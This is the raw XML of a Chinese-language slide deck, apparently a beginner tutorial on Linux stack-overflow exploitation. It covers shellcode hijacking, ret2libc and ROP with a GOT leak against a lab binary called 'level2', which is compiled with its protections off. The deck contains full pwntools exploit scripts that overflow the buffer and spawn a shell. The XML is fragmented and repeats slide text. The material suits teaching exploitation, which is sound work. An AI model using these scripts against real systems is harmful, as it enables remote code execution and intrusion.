                </a:solidFill>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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4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先构造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在内存中的地址。注意我们的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gadget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dirty="0" smtClean="0"/>
              <a:t>call qword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[r12+rbx*8]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，所以我们应该使用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write.got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的地址而不是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write.plt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的地址。并且为了返回到原程序中，重复利用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overflow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的漏洞，我们需要继续覆盖栈上的数据，直到把返回值覆盖成目标函数的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72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先构造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在内存中的地址。注意我们的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gadget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dirty="0" smtClean="0"/>
              <a:t>call qword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[r12+rbx*8]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，所以我们应该使用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write.got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的地址而不是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write.plt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的地址。并且为了返回到原程序中，重复利用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overflow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的漏洞，我们需要继续覆盖栈上的数据，直到把返回值覆盖成目标函数的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0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52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32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3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7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#!/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python</a:t>
            </a:r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pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> import *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 = process('./level2')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>#p = remote('127.0.0.1',10002)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ret = 0xb7e379b0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>systemaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=0xb7e43d80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>binshaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=0xb7f64a3f#wrong bin's address will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>shuaichu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> error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payload =  'A'*140 + p32(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>systemaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>) + p32(ret) + p32(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>binshaddr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p.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(payload)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p.interactive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0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http://wooyun.jozxing.cc/static/drops/tips-6597.html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7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8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http://wooyun.jozxing.cc/static/drops/tips-6597.html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7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http://wooyun.jozxing.cc/static/drops/tips-6597.html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7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http://wooyun.jozxing.cc/static/drops/tips-6597.html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6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#!/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python</a:t>
            </a:r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pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> import *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libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> = ELF('libc.so')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>elf = ELF('level2')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 = process('./level2')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>#p = remote('127.0.0.1', 10003)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plt_write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elf.symbols</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>['write']</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>print '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>plt_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>= ' + hex(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>plt_write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got_write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elf.got</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>['write']</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>print '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>got_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>= ' + hex(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>got_write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vulfun_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> = 0x0804843b#objdump -d get the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>vulnerable_function's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>print '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>vulfun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>= ' + hex(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>vulfun_addr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#write(STDOUT,got_write,4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>payload1 = 'a'*140 + p32(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>plt_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>) + p32(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>vulfun_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>) + p32(1) +p32(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>got_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>) + p32(4)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print "\n###sending payload1 ...###"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>p.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(payload1)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print "\n###</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>receving</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> write()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...###"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>write_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> = u32(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>p.recv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(4))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>print '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>write_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=' + hex(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>write_addr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print "\n###calculating system()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and \"/bin/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\"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...###"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>system_addr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write_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> - (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>libc.symbols</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>['write'] - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>libc.symbols</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>['system'])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>print '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>system_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>= ' + hex(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>system_addr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binsh_addr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write_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> - (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>libc.symbols</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>['write'] - next(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>libc.search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>('/bin/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')))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>print '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>binsh_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>= ' + hex(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>binsh_addr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#ret2libc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>payload2 = 'a'*140  + p32(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>system_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>) + p32(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>vulfun_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>) + p32(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>binsh_addr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print "\n###sending payload2 ...###"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>p.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(payload2)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p.interactive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean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851FB-6D1A-4C2C-81B9-9B7FBD4B34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7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4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4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3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2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7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1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2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F76F-BD91-4D93-8470-9E3551F69608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A99E-268E-47C5-8D35-3E7B1C8C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6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shs/Ropper" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/packz/rope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s://github.com/0vercl0k/rp" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/JonathanSalwan/ROPgadget/tree/master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ooyun.jozxing.cc/static/drops/tips-6597.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://wooyun.jozxing.cc/static/drops/papers-755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.bobao.360.cn/learning/detail/3298.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.tuicool.com/articles/vIBbE3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入门级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Linux_x86 &amp; Linux_x64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5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0x01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567"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 程序流</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>劫持</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>定位</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>shellcode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level1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中的位置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>core dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>功能之后，使用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分析出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的地址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6019"/>
            <a:ext cx="3301634" cy="13488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905" y="2534539"/>
            <a:ext cx="7828571" cy="13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713" y="2534539"/>
            <a:ext cx="8334702" cy="48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0x01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567"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 程序流</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>劫持</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>定位</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>shellcode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level1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中的地址之后，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>pwntools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>工具编写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>exp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6019"/>
            <a:ext cx="3301634" cy="13488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311" y="4491912"/>
            <a:ext cx="6428571" cy="21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739" y="2073634"/>
            <a:ext cx="8857143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4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0x02 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ret2libc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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>打开，依然</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>关闭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>stack protector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ASLR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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-stack-protector -o level2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>level2.c</a:t>
            </a:r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/>
              <a:t>让程序执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system(“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sh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，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>也可以获取到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>函数的地址可以从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共享库中查找到（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是关闭的）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关掉了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，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数在内存中的地址是不会变化的，并且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>libc.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中也包含”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这个字符串，并且这个字符串的地址也是固定的</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9555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0x02 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ret2libc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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>打开，依然</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>关闭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>stack protector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ASLR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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-stack-protector -o level2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>level2.c</a:t>
            </a:r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/>
              <a:t>让程序执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system(“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sh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，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>也可以获取到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>函数的地址可以从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共享库中查找到（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是关闭的）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关掉了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，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数在内存中的地址是不会变化的，并且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>libc.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中也包含”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这个字符串，并且这个字符串的地址也是固定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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>调试分析出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的地址和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>”/bin/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02" y="5141167"/>
            <a:ext cx="5809524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0x02 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ret2libc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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>打开，依然</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>关闭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>stack protector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ASLR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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-stack-protector -o level2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>level2.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>EXP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获取到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函数地址和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>”/bin/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地址之后，编写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>exp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exp2.py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8740" y="49950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6890"/>
            <a:ext cx="5838095" cy="24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378" y="4282159"/>
            <a:ext cx="6228571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0x03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ROP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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ASLR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>保护</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty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echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2 &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>proc/sys/kernel/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>randomize_va_space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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>exp2.py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12" y="3044471"/>
            <a:ext cx="6152381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0x03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ROP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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观察开启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后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每次加载进内存的地址都会改变</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>cat /proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>]/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>maps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次执行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>level2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cat /proc/[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
